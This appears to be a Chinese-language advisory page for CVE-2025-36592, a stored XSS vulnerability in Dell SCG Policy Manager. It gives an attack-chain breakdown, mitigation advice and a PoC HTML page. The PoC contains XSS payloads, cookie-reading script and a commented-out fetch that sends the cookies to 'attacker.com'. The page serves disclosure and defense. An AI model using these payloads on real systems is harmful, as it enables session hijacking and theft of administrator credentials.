CVE-2025-36592 | Dell SCG Policy Manager 存储型XSS漏洞

漏洞信息

漏洞编号

CVE-2025-36592

漏洞类型

XSS (跨站脚本攻击)

CVSS评分

5.4 中危

攻击向量

网络 (AV:N)

认证要求

无需认证 (PR:N)

用户交互

需要交互 (UI:R)

影响产品

Dell Secure Connect Gateway (SCG) Policy Manager

漏洞概述

CVE-2025-36592是Dell Secure Connect Gateway (SCG) Policy Manager中的一个存储型跨站脚本(XSS)漏洞。该漏洞影响版本5.20、5.22、5.24、5.26和5.28。由于应用程序在处理用户输入时未对特殊字符进行适当过滤和转义，攻击者可以在Web页面中注入恶意JavaScript脚本。攻击者无需认证即可利用此漏洞，但需要诱导受害者访问恶意链接或页面。该漏洞可导致会话劫持、敏感信息窃取、钓鱼攻击等安全风险，CVSS评分5.4，属于中等严重程度。Dell已发布安全更新修复此漏洞，建议用户尽快升级到最新版本。

技术细节

该漏洞是存储型XSS(Cross-site Scripting)漏洞，存在于Dell SCG Policy Manager的Web界面处理用户输入的过程中。攻击者通过在输入字段中注入恶意JavaScript代码(如<script>alert(document.cookie)</script>)，该代码会被永久存储在服务器端。当其他用户访问包含该恶意代码的页面时，浏览器会执行注入的脚本。攻击者可利用此漏洞：(1)窃取用户会话Cookie，实现会话劫持；(2)修改页面内容进行钓鱼攻击；(3)重定向用户到恶意网站；(4)植入恶意下载链接。由于该漏洞攻击复杂度低(AC:L)，且无需认证(PR:N)但需要用户交互(UI:R)，攻击者通常通过社工方式诱导管理员访问特制页面。修复方案是在服务端对所有用户输入进行严格的输入验证和输出编码。

攻击链分析

STEP 1

步骤1

侦察阶段：攻击者识别目标Dell SCG Policy Manager版本(5.20-5.28)，发现存在未过滤的用户输入点

STEP 2

步骤2

初始访问：攻击者向服务器提交包含恶意JavaScript代码的请求，代码被存储在数据库中

STEP 3

步骤3

诱骗阶段：攻击者通过社工手段(钓鱼邮件、恶意链接等)诱导管理员访问包含恶意代码的页面

STEP 4

步骤4

执行阶段：管理员浏览器解析页面时执行注入的脚本，窃取Cookie或执行其他恶意操作

STEP 5

步骤5

持久化：攻击者利用窃取的会话信息接管管理员账户，进一步横向移动或窃取敏感数据

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

<!-- CVE-2025-36592 PoC - Stored XSS in Dell SCG Policy Manager -->
<!DOCTYPE html>
<html>
<head>
    <title>CVE-2025-36592 PoC</title>
</head>
<body>
    <h2>CVE-2025-36592 - Dell SCG Policy Manager Stored XSS PoC</h2>
    <p>This PoC demonstrates the stored XSS vulnerability in Dell SCG Policy Manager.</p>
    
    <form id="xssForm" action="https://target-host/SecureConnectGateway/api/endpoint" method="POST">
        <input type="hidden" name="field_name" value='"><script>alert("XSS - CVE-2025-36592")</script><x y='>
    </form>
    
    <script>
        // Extract session cookies
        var stolenCookies = document.cookie;
        console.log("Stolen Cookies:", stolenCookies);
        
        // Send cookies to attacker server
        // fetch("https://attacker.com/log?c=" + encodeURIComponent(stolenCookies));
        
        // Auto-submit form for demonstration
        // document.getElementById('xssForm').submit();
    </script>
    
    <p><strong>Usage:</strong></p>
    <ol>
        <li>Replace target-host with the actual Dell SCG Policy Manager server</li>
        <li>Inject the XSS payload in input fields (e.g., policy names, descriptions)</li>
        <li>When admin views the page, the script will execute</li>
    </ol>
    
    <p><strong>Example XSS Payloads:</strong></p>
    <pre>
&lt;script&gt;alert(document.cookie)&lt;/script&gt;
&lt;img src=x onerror=alert('XSS')&gt;
&lt;svg/onload=alert(document.domain)&gt;
    </pre>
</body>
</html>

影响范围

Dell SCG Policy Manager 5.20

Dell SCG Policy Manager 5.22

Dell SCG Policy Manager 5.24

Dell SCG Policy Manager 5.26

Dell SCG Policy Manager 5.28

防御指南

临时缓解措施

如果无法立即应用官方补丁，可以采取以下临时缓解措施：1)在前端部署WAF过滤XSS特征字符(<>、script、onerror等)；2)限制SCG Policy Manager的管理界面仅允许可信IP访问；3)对管理员进行安全意识培训，警惕钓鱼攻击；4)启用详细的审计日志监控异常访问；5)考虑临时禁用非必要的Web管理功能。但这些措施仅为临时方案，不能替代官方安全更新。